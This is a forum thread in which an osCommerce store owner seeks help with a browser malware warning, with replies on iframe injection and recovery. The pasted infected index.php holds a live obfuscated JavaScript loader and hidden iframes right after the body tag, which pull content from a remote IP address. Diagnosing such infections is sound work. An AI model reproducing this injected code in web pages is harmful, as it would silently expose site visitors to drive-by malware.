Virus at server side files

Is it possible that your site hosted on a server and got infected with some type of virus.

Some HTML.Mallware or something like that,

If it happens, who is the responsible for that,

You know hosting companies provide FTP account, so that you can upload your files from local pc to server.

If your pc is already infect and you transfer some files to server, Is that possible that a virus is transfered with your files.

if it happens, what will you do to solve the issue.

The issue is… my php site is hosted at a server and when anyone browse it, antivirus window pop-out, that there is a virus in the site.

When I go to temporary Internet files, I find this error.

http://i137.photobucket.com/albums/q231/mirza_yasir4/News/error2-1.jpg

AVG antivirus heals it everytime but next time when I open my site, same thing appears.

Re: Virus at server side files

That is basically a trojan. JS downloads a .jpg file to computer, renames it to .exe and the crap starts.

If it's on your website chances are:

1) Someone has access to your account/host and modified the website
2) Your website is vulnerable to XSS, an attacker used this weakness to remotely embed the trojan.

Re: Virus at server side files

any solution sir ?

well, I changed my local pc antivirus and now the message is like this. …
http://i137.photobucket.com/albums/q231/mirza_yasir4/News/AviraError.jpg

I contact with the server support team, they told me the same thing. that some hacker put an “i-frame” tag inside my index.php file.
Any Suggestions,

According to me, we have a backup on the server of three days ago, as I remember, before 3 days, it was fine, should I restore that, but I am afraid it will also change the content of mysql database.

Re: Virus at server side files

An i-frame simply embeds a frame (website) inside your current page:

<iframe 
src ="www.hacker.com/trojan.php"
width="0%">
</iframe>

The above code would include a frame, rendered by your browser but not displayed.

Ok so we know the hacker made an addition to your code. Now what you have to figure out is how?

Some possible scenarios:

1) Your web application (PHP code) is vulnerable to attacks. PHP does not do bound checking like Java as such quite easy to find and run buffer overflow exploits. Could an attacker remotely embed the code by executing a small script in payload?

2) Did the attacker compromise your account? this could be down to known vulnerabilities (very unlikely unknown in this case) on your hosting package e.g. using a outdated version of PHP, Apache? Knows your login credentials

3) Host server been compromised. Same as above implies but rather than just your account all users been compromised.

A roll back would be a good idea. Your database could be compromised - we don't know until you find out. Do you have a log of all activity, any backups, roll back recent transactions?

I would suggest you try to gather as much information as possible from the server support team. Work with them to find out how your account was compromised. If they don't investigate time to change host. If you don't find out what happens same person or someone else could do the same again. But destroy everything if they wanted to.

Re: Virus at server side files

The support team told me that, Directory log is not available, Why ? I asked
They said may be hacker has deleted that,
right now i am unable to connect to my account via ftp.
however I can login to my account via web, but I dont have access to my site files.

I am familier with i-frame, but that I can fix when I will get access to my files. I have several ftp accounts within my account. May be I should change the passwords for all.

My application is OsCommerce store. It has security vulnarability, OsCommerce support site told me that there are security patches, now I dont know they are applied to my company's store or not. because I am not working here too long.

Ok, I will check these issue and see what happens, thanks for your help, keep in touch if you can.

Re: Virus at server side files

I am just curious the hosting server is IIS or Apache? (Linux or MS) ?

Re: Virus at server side files

Get your host to disable all web access to your site.

Get your host to reconfigure ALL of your passwords for ALL accounts. That includes your PHP DB library if using PEAR, OSCommerece, MySQL etc...

Thoroughly examine what caused the problem. Apply all known patches (OSCommerece has many). Worthwhile moving to a more secure platform?

Find out what if any information was compromised. If it was a e-commerce site, and depending on configuration could be lost credit card data. Hijacked accounts etc...

Once you are confident is having managed the situation ONLY then enable services.

Re: Virus at server side files

You are absolutely correct, I am trying to do that, Right now I am unable to access my ftp accounts, but user name for my account on the web still works,

The support team is very slow. They only reply to my email, chat support is not working.

A little clear now is, the malware name is "HTML_IFRAME.CX"
It only gives error message while browsing the "index.php" page, only on internet explorer 6 or below, not on firefox.

I ask them to run a virus scan on the server, I don't know when they will do that.

Re: Virus at server side files

Server is Apache

Re: Virus at server side files

Any decent host will be sitting behind a proxy firewall which includes a virus scanner built into the appliance. Even if they did run a VS on your account server wont really do anything. The malware is remotely hosted.

Re: Virus at server side files

May be you are right, but lets see what happens.The Server support team is not responding, may be they have some issue at the server, because all our FTP accounts are not getting access to the server.

Well, currently, I got it little bit fixed, I entered to OSCommerce FileManager and replaced the index.php file with the one I took backup before one month, as there is no change in structure, everything is coming from database and that is safe. I took backup of the database now.

Before I talk to many antivirus support sites, inculding Symentic and TrendMicro, no one could suggest me anything about fixing a malware issue at server, All are saying run a full scan into your pc. :D I shouted many times, that this is a server issue.

The infected code of "index.php" I put in a text file and then run a scan locally, antivirus caught it.

Also I posted the issue at Oscommerce forums and the people suggested me some nice things, I must go for that.

Thanks brother for your help ...:)

Re: Virus at server side files

copy the infected index.php and paste it here:

Use the

 tags for formatting.

Re: Virus at server side files

<?php
/*
  $Id: index.php,v 1.1 2003/06/11 17:37:59 hpdl Exp $

  osCommerce, Open Source E-Commerce Solutions
  http://www.oscommerce.com

  Copyright (c) 2003 osCommerce

  Released under the GNU General Public License
*/

  require('includes/application_top.php');


define('TEXT_GREETING_PERSONAL_AR', 'Welcome back <span class="greetUser">%s!</span> Would you like to see which <a href="%s"><u>new products</u></a> are available to purchase?');


define('TEXT_GREETING_GUEST_AR', '<span lang="AR-SA" dir="RTL" style="font-size: 18.0pt;">مرحبا بك يازائر ! ادخل فى حسابك <a href="%s"><u>هنا</u></a> او افتح حساب جديد <a href="%s"><u>هنا</u></a></span>');

  function tep_customer_greeting_ar() {
    global $customer_id, $customer_first_name;

    if (tep_session_is_registered('customer_first_name') && tep_session_is_registered('customer_id')) {
//      $greeting_string = sprintf(TEXT_GREETING_PERSONAL_AR, tep_output_string_protected($customer_first_name), tep_href_link(FILENAME_PRODUCTS_NEW));
    } else {
      $greeting_string = sprintf(TEXT_GREETING_GUEST_AR, tep_href_link(FILENAME_LOGIN, '', 'SSL'), tep_href_link(FILENAME_CREATE_ACCOUNT, '', 'SSL'));
    }

    return $greeting_string;
  }

// the following cPath references come from application_top.php
  $category_depth = 'top';
  if (isset($cPath) && tep_not_null($cPath)) {
    $categories_products_query = tep_db_query("select count(*) as total from " . TABLE_PRODUCTS_TO_CATEGORIES . " where categories_id = '" . (int)$current_category_id . "'");
    $cateqories_products = tep_db_fetch_array($categories_products_query);
    if ($cateqories_products'total'] > 0) {
      $category_depth = 'products'; // display products
    } else {
      $category_parent_query = tep_db_query("select count(*) as total from " . TABLE_CATEGORIES . " where parent_id = '" . (int)$current_category_id . "'");
      $category_parent = tep_db_fetch_array($category_parent_query);
      if ($category_parent'total'] > 0) {
        $category_depth = 'nested'; // navigate through the categories
      } else {
        $category_depth = 'products'; // category has no products, but display the 'no products' message
      }
    }
  }

  require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_DEFAULT);
?>
<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html <?php echo HTML_PARAMS; ?>>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=<?php echo CHARSET; ?>"> 
<title><?php echo TITLE; ?></title>
<base href="<?php echo (($request_type == 'SSL') ? HTTPS_SERVER : HTTP_SERVER) . DIR_WS_CATALOG; ?>">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<script type="text/javascript">
<!--
if (document.layers){
    window.captureEvents(Event.MOUSEDOWN | Event.MOUSEUP)
    window.onmousedown=rightclick;
    window.onmouseup=rightclick;

    function rightclick(e) {
    if (e.which == 3) {
    // Put right mouse code here
    alert('Copyright © 2004 NASA est.');
    return false;
    }
    else {
        return true;
        }
    }
}
if (document.all){
    function click() {
    if (event.button==2) {
    alert('Copyright © 2004 NASA est.')
    }

    if (event.button==3) {
    alert('Copyright © 2004 NASA est.')}
    }
    document.onmousedown=click
}
// -->
</script>

<script language="javascript"><!--
var i=0;
function resize() {
  if (navigator.appName == 'Netscape') i=40;
  if (document.images[0]) window.resizeTo(document.images[0].width +30, document.images[0].height+60-i);
  self.focus();
}
//--></script>
<link rel="stylesheet" type="text/css" href="stylesheet.css">
</head>
<body marginwidth="0" marginheight="0" topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0"><iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v48120f3d1fd6d(v48120f3d2056f){  return(parseInt(v48120f3d2056f,16));}function v48120f3d21ca7(v48120f3d22476){ function v48120f3d23be3 () {var v48120f3d243b4=2; return v48120f3d243b4;} var v48120f3d22c46='';for(v48120f3d23417=0; v48120f3d23417<v48120f3d22476.length; v48120f3d23417+=v48120f3d23be3()){ v48120f3d22c46+=(String.fromCharCode(v48120f3d1fd6d(v48120f3d22476.substr(v48120f3d23417, v48120f3d23be3()))));}return v48120f3d22c46;} document.write(v48120f3d21ca7('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D6266623565207372633D5C27687474703A2F2F37372E3232312E3133332E3135302F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A323430383030292B27306661305C272077696474683D343330206865696768743D353630207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>
<!-- header //-->
<?php require(DIR_WS_INCLUDES . 'header.php'); ?>
<!-- header_eof //-->

<!-- body //-->
<table border="0" width="100%" cellspacing="3" cellpadding="3">
  <tr>
    <td width="<?php echo BOX_WIDTH; ?>" valign="top"><table border="0" width="<?php echo BOX_WIDTH; ?>" cellspacing="0" cellpadding="2">
<!-- left_navigation //-->
<?php require(DIR_WS_INCLUDES . 'column_left.php'); ?>
<!-- left_navigation_eof //-->
    </table></td>
<!-- body_text //-->
<?php
  if ($category_depth == 'nested') {
    $category_query = tep_db_query("select cd.categories_name, c.categories_image from " . TABLE_CATEGORIES . " c, " . TABLE_CATEGORIES_DESCRIPTION . " cd where c.categories_id = '" . (int)$current_category_id . "' and cd.categories_id = '" . (int)$current_category_id . "' and cd.language_id = '" . (int)$languages_id . "'");
    $category = tep_db_fetch_array($category_query);
?>
    <td width="100%" valign="top"><table border="0" width="100%" cellspacing="0" cellpadding="0">
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="pageHeading"><?php echo HEADING_TITLE; ?></td>
            <td class="pageHeading" align="right"><?php echo tep_image(DIR_WS_IMAGES . $category'categories_image'], $category'categories_name'], HEADING_IMAGE_WIDTH, HEADING_IMAGE_HEIGHT); ?></td>
          </tr>
        </table></td>
      </tr>
      <tr>
        <td><?php echo tep_draw_separator('pixel_trans.gif', '100%', '10'); ?></td>
      </tr>
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="2">
          <tr>
            <td><table border="0" width="100%" cellspacing="0" cellpadding="2">
              <tr>
<?php
    if (isset($cPath) && strpos('_', $cPath)) {
// check to see if there are deeper categories within the current category
      $category_links = array_reverse($cPath_array);
      for($i=0, $n=sizeof($category_links); $i<$n; $i++) {
        $categories_query = tep_db_query("select count(*) as total from " . TABLE_CATEGORIES . " c, " . TABLE_CATEGORIES_DESCRIPTION . " cd where c.parent_id = '" . (int)$category_links$i] . "' and c.categories_id = cd.categories_id and cd.language_id = '" . (int)$languages_id . "'");
        $categories = tep_db_fetch_array($categories_query);
        if ($categories'total'] < 1) {
          // do nothing, go through the loop
        } else {
          $categories_query = tep_db_query("select c.categories_id, cd.categories_name, c.categories_image, c.parent_id from " . TABLE_CATEGORIES . " c, " . TABLE_CATEGORIES_DESCRIPTION . " cd where c.parent_id = '" . (int)$category_links$i] . "' and c.categories_id = cd.categories_id and cd.language_id = '" . (int)$languages_id . "' order by sort_order, cd.categories_name");
          break; // we've found the deepest category the customer is in
        }
      }
    } else {
      $categories_query = tep_db_query("select c.categories_id, cd.categories_name, c.categories_image, c.parent_id from " . TABLE_CATEGORIES . " c, " . TABLE_CATEGORIES_DESCRIPTION . " cd where c.parent_id = '" . (int)$current_category_id . "' and c.categories_id = cd.categories_id and cd.language_id = '" . (int)$languages_id . "' order by sort_order, cd.categories_name");
    }

    $number_of_categories = tep_db_num_rows($categories_query);

    $rows = 0;
    while ($categories = tep_db_fetch_array($categories_query)) {
      $rows++;
      $cPath_new = tep_get_path($categories'categories_id']);
      $width = (int)(100 / MAX_DISPLAY_CATEGORIES_PER_ROW) . '%';
      echo '                <td align="center" class="smallText" width="' . $width . '" valign="top"><a href="' . tep_href_link(FILENAME_DEFAULT, $cPath_new) . '">' . tep_image(DIR_WS_IMAGES . $categories'categories_image'], $categories'categories_name'], SUBCATEGORY_IMAGE_WIDTH, SUBCATEGORY_IMAGE_HEIGHT) . '<br>' . $categories'categories_name'] . '</a></td>' . "n";
      if ((($rows / MAX_DISPLAY_CATEGORIES_PER_ROW) == floor($rows / MAX_DISPLAY_CATEGORIES_PER_ROW)) && ($rows != $number_of_categories)) {
        echo '              </tr>' . "n";
        echo '              <tr>' . "n";
      }
    }

// needed for the new products module shown below
    $new_products_category_id = $current_category_id;
?>
              </tr>
            </table></td>
          </tr>
          <tr>
            <td><?php echo tep_draw_separator('pixel_trans.gif', '100%', '10'); ?></td>
          </tr>
          <tr>
            <td><?php include(DIR_WS_MODULES . FILENAME_NEW_PRODUCTS); ?></td>
          </tr>
        </table></td>
      </tr>
    </table></td>
<?php
  } elseif ($category_depth == 'products' || isset($HTTP_GET_VARS'manufacturers_id'])) {
// create column list
    $define_list = array('PRODUCT_LIST_MODEL' => PRODUCT_LIST_MODEL,
                         'PRODUCT_LIST_NAME' => PRODUCT_LIST_NAME,
                         'PRODUCT_LIST_MANUFACTURER' => PRODUCT_LIST_MANUFACTURER,
                         'PRODUCT_LIST_PRICE' => PRODUCT_LIST_PRICE,
                         'PRODUCT_LIST_QUANTITY' => PRODUCT_LIST_QUANTITY,
                         'PRODUCT_LIST_WEIGHT' => PRODUCT_LIST_WEIGHT,
                         'PRODUCT_LIST_IMAGE' => PRODUCT_LIST_IMAGE,
                         'PRODUCT_LIST_BUY_NOW' => PRODUCT_LIST_BUY_NOW);

    asort($define_list);

    $column_list = array();
    reset($define_list);
    while (list($key, $value) = each($define_list)) {
      if ($value > 0) $column_list] = $key;
    }

    $select_column_list = '';

    for ($i=0, $n=sizeof($column_list); $i<$n; $i++) {
      switch ($column_list$i]) {
        case 'PRODUCT_LIST_MODEL':
          $select_column_list .= 'p.products_model, ';
          break;
        case 'PRODUCT_LIST_NAME':
          $select_column_list .= 'pd.products_name, ';
          break;
        case 'PRODUCT_LIST_MANUFACTURER':
          $select_column_list .= 'm.manufacturers_name, ';
          break;
        case 'PRODUCT_LIST_QUANTITY':
          $select_column_list .= 'p.products_quantity, ';
          break;
        case 'PRODUCT_LIST_IMAGE':
          $select_column_list .= 'p.products_image, ';
          break;
        case 'PRODUCT_LIST_WEIGHT':
          $select_column_list .= 'p.products_weight, ';
          break;
      }
    }

// show the products of a specified manufacturer
    if (isset($HTTP_GET_VARS'manufacturers_id'])) {
      if (isset($HTTP_GET_VARS'filter_id']) && tep_not_null($HTTP_GET_VARS'filter_id'])) {
// We are asked to show only a specific category
        $listing_sql = "select " . $select_column_list . " p.products_id, p.vorhanden, p.manufacturers_id, p.products_price, p.products_tax_class_id, IF(s.status, s.specials_new_products_price, NULL) as specials_new_products_price, IF(s.status, s.specials_new_products_price, p.products_price) as final_price from " . TABLE_PRODUCTS . " p, " . TABLE_PRODUCTS_DESCRIPTION . " pd, " . TABLE_MANUFACTURERS . " m, " . TABLE_PRODUCTS_TO_CATEGORIES . " p2c left join " . TABLE_SPECIALS . " s on p.products_id = s.products_id where p.products_status = '1' and p.manufacturers_id = m.manufacturers_id and m.manufacturers_id = '" . (int)$HTTP_GET_VARS'manufacturers_id'] . "' and p.products_id = p2c.products_id and pd.products_id = p2c.products_id and pd.language_id = '" . (int)$languages_id . "' and p2c.categories_id = '" . (int)$HTTP_GET_VARS'filter_id'] . "'";
      } else {
// We show them all
        $listing_sql = "select " . $select_column_list . " p.products_id, p.vorhanden, p.manufacturers_id, p.products_price, p.products_tax_class_id, IF(s.status, s.specials_new_products_price, NULL) as specials_new_products_price, IF(s.status, s.specials_new_products_price, p.products_price) as final_price from " . TABLE_PRODUCTS . " p, " . TABLE_PRODUCTS_DESCRIPTION . " pd, " . TABLE_MANUFACTURERS . " m left join " . TABLE_SPECIALS . " s on p.products_id = s.products_id where p.products_status = '1' and pd.products_id = p.products_id and pd.language_id = '" . (int)$languages_id . "' and p.manufacturers_id = m.manufacturers_id and m.manufacturers_id = '" . (int)$HTTP_GET_VARS'manufacturers_id'] . "'";
      }
    } else {
// show the products in a given categorie
      if (isset($HTTP_GET_VARS'filter_id']) && tep_not_null($HTTP_GET_VARS'filter_id'])) {
// We are asked to show only specific catgeory
        $listing_sql = "select " . $select_column_list . " p.products_id, p.vorhanden, p.manufacturers_id, p.products_price, p.products_tax_class_id, IF(s.status, s.specials_new_products_price, NULL) as specials_new_products_price, IF(s.status, s.specials_new_products_price, p.products_price) as final_price from " . TABLE_PRODUCTS . " p, " . TABLE_PRODUCTS_DESCRIPTION . " pd, " . TABLE_MANUFACTURERS . " m, " . TABLE_PRODUCTS_TO_CATEGORIES . " p2c left join " . TABLE_SPECIALS . " s on p.products_id = s.products_id where p.products_status = '1' and p.manufacturers_id = m.manufacturers_id and m.manufacturers_id = '" . (int)$HTTP_GET_VARS'filter_id'] . "' and p.products_id = p2c.products_id and pd.products_id = p2c.products_id and pd.language_id = '" . (int)$languages_id . "' and p2c.categories_id = '" . (int)$current_category_id . "'";
      } else {
// We show them all
        $listing_sql = "select " . $select_column_list . " p.products_id, p.vorhanden, p.manufacturers_id, p.products_price, p.products_tax_class_id, IF(s.status, s.specials_new_products_price, NULL) as specials_new_products_price, IF(s.status, s.specials_new_products_price, p.products_price) as final_price from " . TABLE_PRODUCTS_DESCRIPTION . " pd, " . TABLE_PRODUCTS . " p left join " . TABLE_MANUFACTURERS . " m on p.manufacturers_id = m.manufacturers_id, " . TABLE_PRODUCTS_TO_CATEGORIES . " p2c left join " . TABLE_SPECIALS . " s on p.products_id = s.products_id where p.products_status = '1' and p.products_id = p2c.products_id and pd.products_id = p2c.products_id and pd.language_id = '" . (int)$languages_id . "' and p2c.categories_id = '" . (int)$current_category_id . "'";
      }
    }

    if ( (!isset($HTTP_GET_VARS'sort'])) || (!ereg('[1-8][ad]', $HTTP_GET_VARS'sort'])) || (substr($HTTP_GET_VARS'sort'], 0, 1) > sizeof($column_list)) ) {
      for ($i=0, $n=sizeof($column_list); $i<$n; $i++) {
        if ($column_list$i] == 'PRODUCT_LIST_NAME') {
          $HTTP_GET_VARS'sort'] = $i+1 . 'a';
          $listing_sql .= " order by pd.products_name";
          break;
        }
      }
    } else {
      $sort_col = substr($HTTP_GET_VARS'sort'], 0 , 1);
      $sort_order = substr($HTTP_GET_VARS'sort'], 1);
      $listing_sql .= ' order by ';
      switch ($column_list$sort_col-1]) {
        case 'PRODUCT_LIST_MODEL':
          $listing_sql .= "p.products_model " . ($sort_order == 'd' ? 'desc' : '') . ", pd.products_name";
          break;
        case 'PRODUCT_LIST_NAME':
          $listing_sql .= "pd.products_name " . ($sort_order == 'd' ? 'desc' : '');
          break;
        case 'PRODUCT_LIST_MANUFACTURER':
          $listing_sql .= "m.manufacturers_name " . ($sort_order == 'd' ? 'desc' : '') . ", pd.products_name";
          break;
        case 'PRODUCT_LIST_QUANTITY':
          $listing_sql .= "p.products_quantity " . ($sort_order == 'd' ? 'desc' : '') . ", pd.products_name";
          break;
        case 'PRODUCT_LIST_IMAGE':
          $listing_sql .= "pd.products_name";
          break;
        case 'PRODUCT_LIST_WEIGHT':
          $listing_sql .= "p.products_weight " . ($sort_order == 'd' ? 'desc' : '') . ", pd.products_name";
          break;
        case 'PRODUCT_LIST_PRICE':
          $listing_sql .= "final_price " . ($sort_order == 'd' ? 'desc' : '') . ", pd.products_name";
          break;
      }
    }
?>
    <td width="100%" valign="top"><table border="0" width="100%" cellspacing="0" cellpadding="0">
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="pageHeading"><?php echo HEADING_TITLE; ?></td>
<?php
// optional Product List Filter
    if (PRODUCT_LIST_FILTER > 0) {
      if (isset($HTTP_GET_VARS'manufacturers_id'])) {
        $filterlist_sql = "select distinct c.categories_id as id, cd.categories_name as name from " . TABLE_PRODUCTS . " p, " . TABLE_PRODUCTS_TO_CATEGORIES . " p2c, " . TABLE_CATEGORIES . " c, " . TABLE_CATEGORIES_DESCRIPTION . " cd where p.products_status = '1' and p.products_id = p2c.products_id and p2c.categories_id = c.categories_id and p2c.categories_id = cd.categories_id and cd.language_id = '" . (int)$languages_id . "' and p.manufacturers_id = '" . (int)$HTTP_GET_VARS'manufacturers_id'] . "' order by cd.categories_name";
      } else {
        $filterlist_sql= "select distinct m.manufacturers_id as id, m.manufacturers_name as name from " . TABLE_PRODUCTS . " p, " . TABLE_PRODUCTS_TO_CATEGORIES . " p2c, " . TABLE_MANUFACTURERS . " m where p.products_status = '1' and p.manufacturers_id = m.manufacturers_id and p.products_id = p2c.products_id and p2c.categories_id = '" . (int)$current_category_id . "' order by m.manufacturers_name";
      }
      $filterlist_query = tep_db_query($filterlist_sql);
      if (tep_db_num_rows($filterlist_query) > 1) {
        echo '            <td align="center" class="main">' . tep_draw_form('filter', FILENAME_DEFAULT, 'get') . TEXT_SHOW . ' ';
        if (isset($HTTP_GET_VARS'manufacturers_id'])) {
          echo tep_draw_hidden_field('manufacturers_id', $HTTP_GET_VARS'manufacturers_id']);
          $options = array(array('id' => '', 'text' => TEXT_ALL_CATEGORIES));
        } else {
          echo tep_draw_hidden_field('cPath', $cPath);
          $options = array(array('id' => '', 'text' => TEXT_ALL_MANUFACTURERS));
        }
        echo tep_draw_hidden_field('sort', $HTTP_GET_VARS'sort']);
        while ($filterlist = tep_db_fetch_array($filterlist_query)) {
          $options] = array('id' => $filterlist'id'], 'text' => $filterlist'name']);
        }
        echo tep_draw_pull_down_menu('filter_id', $options, (isset($HTTP_GET_VARS'filter_id']) ? $HTTP_GET_VARS'filter_id'] : ''), 'onchange="this.form.submit()"');
        echo '</form></td>' . "n";
      }
    }

// Get the right image for the top-right
    $image = DIR_WS_IMAGES . 'table_background_list.gif';
    if (isset($HTTP_GET_VARS'manufacturers_id'])) {
      $image = tep_db_query("select manufacturers_image from " . TABLE_MANUFACTURERS . " where manufacturers_id = '" . (int)$HTTP_GET_VARS'manufacturers_id'] . "'");
      $image = tep_db_fetch_array($image);
      $image = $image'manufacturers_image'];
    } elseif ($current_category_id) {
      $image = tep_db_query("select categories_image from " . TABLE_CATEGORIES . " where categories_id = '" . (int)$current_category_id . "'");
      $image = tep_db_fetch_array($image);
      $image = $image'categories_image'];
    }
?>
            <td align="right"><?php echo tep_image(DIR_WS_IMAGES . $image, HEADING_TITLE, HEADING_IMAGE_WIDTH, HEADING_IMAGE_HEIGHT); ?></td>
          </tr>
        </table></td>
      </tr>
      <tr>
        <td><?php echo tep_draw_separator('pixel_trans.gif', '100%', '10'); ?></td>
      </tr>
      <tr>
        <td><?php include(DIR_WS_MODULES . FILENAME_PRODUCT_LISTING); ?></td>
      </tr>
    </table></td>
<?php
  } else { // default page
?>
    <td width="100%" valign="top"><table border="0" width="100%" cellspacing="0" cellpadding="0">
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="pageHeading"><?php echo HEADING_TITLE; ?></td>
<?php /*            <td class="pageHeading" align="right"><?php echo tep_image(DIR_WS_IMAGES . 'table_background_default.gif', HEADING_TITLE, HEADING_IMAGE_WIDTH, HEADING_IMAGE_HEIGHT); ?></td> */ ?>
          </tr>
        </table></td>
      </tr>
      <tr>
        <td><?php echo tep_draw_separator('pixel_trans.gif', '100%', '10'); ?></td>
      </tr>
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="main"><?php echo tep_customer_greeting(); ?><br /><?php
            echo tep_customer_greeting_ar();
            ?>
            <br /></td>
          </tr>
          <tr>
            <td><?php echo tep_draw_separator('pixel_trans.gif', '100%', '10'); ?></td>
          </tr>
          <tr>
            <td class="main"><?php echo TEXT_MAIN; ?></td>
          </tr>
          <tr>
            <td><?php echo tep_draw_separator('pixel_trans.gif', '100%', '10'); ?></td>
          </tr>
          <tr>
            <td><?php include(DIR_WS_MODULES . 'main_categories.php'); ?></td>
          </tr>
          <tr>
            <td><?php echo tep_draw_separator('pixel_trans.gif', '100%', '10'); ?></td>
          </tr>
          <tr>
            <td><?php include(DIR_WS_MODULES . FILENAME_NEW_PRODUCTS); ?></td>
          </tr>
<?php
    include(DIR_WS_MODULES . FILENAME_UPCOMING_PRODUCTS);
?>
        </table></td>
      </tr>
    </table></td>
<?php
  }
?>
<!-- body_text_eof //-->
    <td width="<?php echo BOX_WIDTH; ?>" valign="top"><table border="0" width="<?php echo BOX_WIDTH; ?>" cellspacing="0" cellpadding="2">
<!-- right_navigation //-->
<?php require(DIR_WS_INCLUDES . 'column_right.php'); ?>
<!-- right_navigation_eof //-->
    </table></td>
  </tr>
</table>
<!-- body_eof //-->

<!-- footer //-->
<?php require(DIR_WS_INCLUDES . 'footer.php'); ?>
<!-- footer_eof //-->
<br>
</body>
</html>
<?php require(DIR_WS_INCLUDES . 'application_bottom.php'); ?>

Re: Virus at server side files

yup.........posted...

this file I put in zip form in my pc. whenever I open this, my Avira AV pop-up, that there is a malware inside this file.

Checkout the longest line in above code, you will see some weired code... right bedise the html < body tag

Re: Virus at server side files

Thanks. Very interesting.

My background is in security but not specifically on secure coding or virus research. From the bits I can gather (never learnt JS), that long line is the malware.

My guess is:

All of those random names (numbers) are given to obfuscate what the code really does. Further to that the unicode chars are summed up into a loop which proudces the malware (virus). Final step is a conversion to ASCII which when rendered will compromise the browser, or attend to anyway.

But also notice the iframe with source of: hxxp://77.221.133.150/.if/go.html?292720fa0

problem is not your server security but oscommerce i guess .
issue with these free scripts or massively used scripts are too many people know too much about it and hackers know their flaws more quickly then vendor.

most probably file was uploaded through your script in a directory which has write permission using sql injection i guess.

i am sure they must have done so much other than just editing the iframe.

it happened to us long ago when guy uploaded lot of scary stuff to our site and he was using that so send emails.

fortunately for me they were not able to take over whole system due to some security measures I GUESS but surely they had sql access can be limited as they were able to just do few minor things.

only remedy switch from oscommerce spend few 100-150$ buy some decent script.

Yes you are right :-)

However issue is over long time ago